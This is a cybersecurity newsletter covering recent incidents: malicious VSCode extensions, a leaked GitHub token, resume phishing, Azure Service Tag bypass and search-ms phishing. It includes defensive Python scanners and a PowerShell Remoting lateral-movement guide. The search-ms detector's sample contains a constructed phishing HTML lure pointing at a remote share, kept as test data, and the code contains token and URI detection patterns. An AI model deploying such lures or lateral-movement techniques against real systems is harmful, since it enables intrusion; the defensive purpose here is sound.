Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
Malicious VSCode Extensions Downloaded Over a Million Times
Israeli researchers discovered extensions in the Visual Studio Code Marketplace, including a trojanized ‘Dracula Official’ theme, that collected system information and sent it to a remote server.
Top 3 takeaways:
- The VSCode marketplace was found to host thousands of extensions with millions of installs that pose security risks, such as hardcoded IP addresses and unknown executables.
- The lack of stringent controls and code reviewing mechanisms in the marketplace allows for rampant abuse, posing a direct threat to organizations.
- The researchers plan to release their ‘ExtensionTotal’ tool to help developers scan for threats. They have also reported all malicious extensions to Microsoft for removal.
Exposed GitHub Token Leads to Leak of New York Times Source Code
The New York Times confirmed a data leak after internal source code and data were stolen from its GitHub repositories and posted on the anonymous message board 4chan.
Top 4 takeaways:
- An anonymous user leaked a 273GB archive containing approximately 3.6 million files and 5,000 repositories, including the source code for the Wordle game.
- The breach was executed using an exposed GitHub token, allowing unauthorized access to the company’s code repositories.
- The New York Times stated that the breach did not affect its internal corporate systems or operations, and it has taken measures to monitor for anomalous activity.
- This incident highlights the importance of securing credentials and continuous monitoring for potential security breaches.
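The takeaway about securing credentials is easy to state and hard to operationalise. As an added example (not code from the original newsletter or from the New York Times), the scanner below finds GitHub token formats in text before it reaches a repository. It relies only on the documented token prefixes (`ghp_`, `gho_`, `ghu_`, `ghs_`, `ghr_`, `github_pat_`); the length bounds are approximations, and the sample CI configuration is constructed for the example.

```python
import re
from typing import Dict, List

# Documented GitHub token prefixes. Lengths after the prefix are approximate
# (assumption): classic tokens carry 36 characters, fine-grained PATs are longer.
GITHUB_TOKEN_RE = re.compile(
    r"\b(?:gh[pousr]_[A-Za-z0-9]{36,}|github_pat_[A-Za-z0-9_]{40,})\b"
)

TOKEN_KINDS = {
    "ghp_": "classic personal access token",
    "gho_": "OAuth access token",
    "ghu_": "user-to-server token",
    "ghs_": "server-to-server (installation) token",
    "ghr_": "refresh token",
    "github_pat_": "fine-grained personal access token",
}


def kind_of(token: str) -> str:
    """Classify a token by its prefix so a finding can be triaged without the secret."""
    for prefix, kind in TOKEN_KINDS.items():
        if token.startswith(prefix):
            return kind
    return "unknown"


def redact(token: str) -> str:
    """Keep the prefix and last four characters for correlation; never log the whole token."""
    return f"{token[:8]}...{token[-4:]}"


def find_github_tokens(text: str) -> List[Dict[str, object]]:
    """Scan text line by line and return redacted findings, e.g. for a pre-commit hook."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in GITHUB_TOKEN_RE.finditer(line):
            token = match.group(0)
            hits.append({"line": lineno, "kind": kind_of(token), "redacted": redact(token)})
    return hits


# Constructed sample: a CI config that leaks two credentials. Neither value is a real token.
SAMPLE_CONFIG = "\n".join([
    "# constructed sample: a CI config that leaks credentials",
    "GITHUB_TOKEN=ghp_0123456789abcdefghijABCDEFGHIJklmnop",
    "API_URL=https://api.github.com",
    "deploy_key: github_pat_" + "A" * 22 + "_" + "B" * 59,
    "note: the string ghp_short is not a token",
])

if __name__ == "__main__":
    for hit in find_github_tokens(SAMPLE_CONFIG):
        print(f"line {hit['line']}: {hit['kind']} ({hit['redacted']})")
```

Run this over staged files in a pre-commit hook and fail the commit on any hit; GitHub's own secret scanning and push protection provide the same check server-side, but a local hook catches the token before it is ever pushed.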
Phishing Attacks Target Recruiters With Malicious Resumes
A recent phishing attack distributed the More_eggs malware by pretending to be a resume, targeting recruiters in the industrial services industry.
Top 4 takeaways:
- The malware, linked to the Golden Chickens threat actor, uses social engineering to lure victims into downloading malicious files via fake job applications on LinkedIn.
- The attack involves a fake resume download site that delivers a Windows Shortcut file. The shortcut file retrieves a malicious DLL to establish persistence and deploy the More_eggs backdoor.
- Similar social engineering campaigns have been seen recently, including the V3B phishing kit targeting European banking customers and fake websites impersonating legitimate software to distribute the Vidar Stealer malware.
- Attacks like this are expected to become more common as advanced capabilities, such as interacting with victims in real time, stealing OTP and PhotoTAN codes, and QR code jacking, spread among phishing kits.
Microsoft Azure Service Tags Can Be Abused by Hackers
Microsoft has issued a warning that Azure Service Tags can be misused by attackers to bypass firewall rules and gain unauthorized access to cloud resources.
Top 4 takeaways:
- Cybersecurity firm Tenable discovered that firewall rules which allow traffic based solely on a Service Tag can be bypassed: a tag covers the address space of an Azure service for every tenant, so an attacker who can send traffic through that service arrives from an allowed source.
- At least 10 Azure services, including Azure Application Insights and Azure DevOps, are affected.
- Customers are advised to review their use of service tags and implement adequate security measures to authenticate trusted network traffic.
- This vulnerability highlights the importance of not solely relying on service tags as a security measure and the need for proper validation controls.
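The practical first step is to find the rules that trust a tag on its own. As an added example (not code from the original newsletter, Tenable, or Microsoft), the audit below reads a network security group in the JSON shape returned by `az network nsg show` and flags every inbound Allow rule whose source is a service tag or wildcard rather than an IP range you control. The sample NSG is constructed; treating `VirtualNetwork` and `AzureLoadBalancer` as not multi-tenant is a design assumption, not a statement from the advisory.

```python
import ipaddress
from typing import Dict, List

# Tags that denote your own VNet (and peers) or the platform health probe rather than
# a shared Azure service; excluding them from findings is an assumption of this audit.
LOCAL_TAGS = {"VirtualNetwork", "AzureLoadBalancer"}


def is_service_tag(prefix: str) -> bool:
    """An NSG source that is neither '*' nor an IP address/CIDR is a service tag."""
    if prefix == "*":
        return False
    try:
        ipaddress.ip_network(prefix, strict=False)
        return False
    except ValueError:
        return True


def rule_sources(props: dict) -> List[str]:
    """Collect both the singular and plural source fields an NSG rule may use."""
    sources = list(props.get("sourceAddressPrefixes") or [])
    if props.get("sourceAddressPrefix"):
        sources.append(props["sourceAddressPrefix"])
    return sources


def audit_nsg(nsg: dict) -> List[Dict[str, object]]:
    """Return inbound Allow rules whose source is a multi-tenant tag or a wildcard.

    Such rules only prove that traffic came *through* an Azure service, not that it came
    from *your* tenant; authentication has to happen at the application layer.
    """
    findings: List[Dict[str, object]] = []
    for rule in nsg["properties"]["securityRules"]:
        p = rule["properties"]
        if p["direction"] != "Inbound" or p["access"] != "Allow":
            continue
        for src in rule_sources(p):
            if src in LOCAL_TAGS:
                continue
            if src == "*" or is_service_tag(src):
                findings.append({
                    "rule": rule["name"],
                    "priority": int(p["priority"]),
                    "source": src,
                    "ports": p.get("destinationPortRange") or p.get("destinationPortRanges"),
                    "reason": "wildcard source" if src == "*" else "trusts a service tag alone",
                })
    return sorted(findings, key=lambda f: f["priority"])


def _rule(name, priority, access, source, port):
    return {"name": name, "properties": {
        "priority": priority, "direction": "Inbound", "access": access, "protocol": "Tcp",
        "sourceAddressPrefix": source, "destinationPortRange": port}}


# Constructed sample NSG; the tag names are illustrative, not a list of affected services.
SAMPLE_NSG = {"name": "web-nsg", "properties": {"securityRules": [
    _rule("allow-devops-443", 100, "Allow", "AzureDevOps", "443"),
    _rule("allow-corp-ssh", 200, "Allow", "10.0.0.0/8", "22"),
    _rule("allow-any-8080", 300, "Allow", "*", "8080"),
    _rule("allow-vnet", 400, "Allow", "VirtualNetwork", "*"),
    _rule("deny-all-inbound", 4096, "Deny", "*", "*"),
]}}

if __name__ == "__main__":
    for f in audit_nsg(SAMPLE_NSG):
        print(f"{f['priority']:>5} {f['rule']}: source={f['source']} ports={f['ports']} ({f['reason']})")
```

A flagged rule is not automatically wrong; the fix is to keep the tag as a coarse network filter and add an authenticated check (a shared secret header for availability tests, OAuth tokens, or mutual TLS) on the receiving service, as Microsoft's guidance on validating trusted traffic recommends.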
New Phishing Campaign Exploits Windows Search Protocol
A new phishing campaign abuses the Windows search protocol to deliver malware via HTML attachments disguised as invoices.
Top 3 takeaways:
- Attackers abuse the search-ms: URI scheme to make Windows Explorer search a remote, attacker-controlled host, so the attacker's files appear to the victim as ordinary search results.
- The HTML file automatically opens the malicious URI (for example via a meta refresh) or provides a clickable link as a fallback, either of which triggers a search against the remote host.
- Trustwave suggests deleting the registry entries associated with the search-ms and search URI protocol handlers to prevent such attacks; note that this also breaks legitimate use of those links, so test the change before rolling it out.
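Mail gateways and sandboxes can catch these attachments before any registry change is needed. As an added example (not code from the original newsletter or from Trustwave), the scanner below pulls search-ms: and search: URIs out of an HTML attachment, decodes their parameters, and extracts the remote host named in the `crumb=location:` parameter. The sample HTML is constructed for the example and uses a documentation address.

```python
import re
from html import unescape
from typing import Dict, List, Set
from urllib.parse import unquote

# Either handler Windows registers; \b keeps "research:" and similar from matching.
SEARCH_URI_RE = re.compile(r"\bsearch(?:-ms)?:[^\"'\s<>]+", re.IGNORECASE)
# crumb=location:\\host\share  -> capture "host" (possibly host@port)
LOCATION_RE = re.compile(r"location:\\\\([^\\]+)", re.IGNORECASE)


def parse_search_uri(uri: str) -> Dict[str, str]:
    """Split 'search-ms:query=..&crumb=..&displayname=..' into its parameters."""
    _scheme, _, rest = uri.partition(":")
    params: Dict[str, str] = {}
    for part in rest.split("&"):
        key, sep, value = part.partition("=")
        if sep:
            params[key.lower()] = value
    return params


def extract_search_ms(html: str) -> List[Dict[str, str]]:
    """Return every search URI in the document with the host it would contact.

    HTML entities are unescaped first because attachments usually write '&amp;'
    between parameters; percent-encoding is removed for the same reason.
    """
    findings: List[Dict[str, str]] = []
    for match in SEARCH_URI_RE.finditer(unescape(html)):
        uri = unquote(match.group(0))
        params = parse_search_uri(uri)
        if "query" not in params:
            continue  # a bare "search:" string in prose, not a protocol launch
        host_match = LOCATION_RE.search(params.get("crumb", ""))
        findings.append({
            "uri": uri,
            "query": params.get("query", ""),
            # displayname is the lure: it is what Explorer shows as the folder name
            "displayname": params.get("displayname", ""),
            "host": host_match.group(1) if host_match else "",
        })
    return findings


def remote_hosts(html: str) -> Set[str]:
    """Distinct remote hosts the attachment would make Explorer connect to."""
    return {f["host"] for f in extract_search_ms(html) if f["host"]}


# Constructed sample attachment: auto-open via meta refresh, clickable link as fallback.
SAMPLE_HTML = r"""<html><head>
<meta http-equiv="refresh" content="0;url=search-ms:query=INVOICE&amp;crumb=location:\\203.0.113.10@80\share&amp;displayname=Downloads">
</head><body>
<p>If the document does not open, <a href="search-ms:query=INVOICE&amp;crumb=location:\\203.0.113.10@80\share&amp;displayname=Downloads">click here</a>.</p>
</body></html>"""

if __name__ == "__main__":
    for f in extract_search_ms(SAMPLE_HTML):
        print(f"host={f['host']} query={f['query']} shown as '{f['displayname']}'")
```

Any non-empty result from `remote_hosts` on an inbound attachment is a strong quarantine signal: legitimate invoices have no reason to launch a Windows search against an external host, and the `displayname` value shows what the victim would have been shown.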
Top Tips of the Week
Threat Intelligence
- Regularly assess the effectiveness of your CTI. Measure its impact on security posture and adjust strategies accordingly.
- Utilize threat intelligence for risk assessment. Identify and prioritize potential risks to allocate resources more effectively.
- Foster a CTI community within your organization. Share insights, experiences, and best practices among CTI practitioners.
Threat Hunting
- Integrate threat intelligence with SOAR platforms. Streamline workflows for efficient threat detection and response.
- Use threat intelligence in both incident response and threat hunting. Proactive measures are as crucial as swift and effective responses.
Custom Tooling
- Consider open-source frameworks for custom tool development. Leverage existing resources to expedite the creation process.
- Create custom tools with a focus on data visualization. Enhance user understanding and decision-making through clear and insightful data representation.
Feature Article
Cyber threat intelligence (CTI) reports are essential for every organization. They allow you to assess emerging threats, prioritize resources, and proactively defend yourself. As a cyber security professional, you must know how to write one well.
This guide will teach you how to write a CTI report, what you must include, and showcase a simple writing process you can follow so you don’t get stuck with writer’s block. It will also highlight best practices for CTI report writing so you can start producing high-quality reports today!
Let’s start by first understanding why CTI report writing is important and the benefits good reports can bring to an organization.
Learning Resources
Domain Takeover With PowerShell Remoting
PowerShell Remoting is a native Windows feature that can be used to take over entire enterprises. It allows you to pivot between machines, automate hacking tasks, and dominate Windows environments while remaining undetected.
This comprehensive guide will teach you about PowerShell Remoting and how to use it to start interactive sessions, execute remote commands, and run complete PowerShell scripts against multiple machines.
You’ll also see how it can be used for common penetration testing actions like lateral movement, privilege escalation, and establishing persistence while evading detection.
Cyber Threat Intelligence Fallacies
Discover common cyber threat intelligence (CTI) fallacies in this awesome presentation by Andy Piazza, head of threat intelligence at IBM X-Force. He critiques the overemphasis on intent and capabilities, the misuse of threat actor profiles, and the pitfalls of threat feeds.
Andy emphasizes the importance of clear communication, critical thinking, and understanding the context of intelligence reports to avoid biases and misinterpretations.
How to Build an Audience With Digital Writing
I am a strong proponent of digital writing and its many benefits, especially for cyber security. This excellent video by Nicholas Cole discusses the best digital writing platforms to build an audience in 2024, emphasizing social platforms over personal blogs.
He explains why writing on social platforms is the best way to build an audience, how to create a content creation strategy, and how to get started.
Apple Announces Its Generative AI
Apple announced its new generative AI, Apple Intelligence, at the WWDC conference. This summary from CNET highlights the technology’s features and limitations, its integration with devices like iPhones and iPads, and the potential for future expansion.
Apple Intelligence will enhance Siri, assist with writing, and offer new photo and emoji generation capabilities. The company's approach to privacy, which focuses on secure, private data handling through what it calls Private Cloud Compute, is also discussed.
Personal Notes
🤔 This week at Kraven, we have been focused on building two new series. One, which I hinted at last week, focuses on cyber threat intelligence (CTI) biases, and another discusses the various data collection sources. We are excited to add to these two series in the coming weeks because each is fundamental to good threat intelligence work.
We have also been playing around with several new CTI tools, such as Flowintel-cm, ATT&CK Powered Suit, and ATT&CK Navigator, on which we hope to release articles soon. Mastering tools is essential to raising your and your team’s productivity.
As always, have a fantastic weekend, and enjoy the learning resources provided!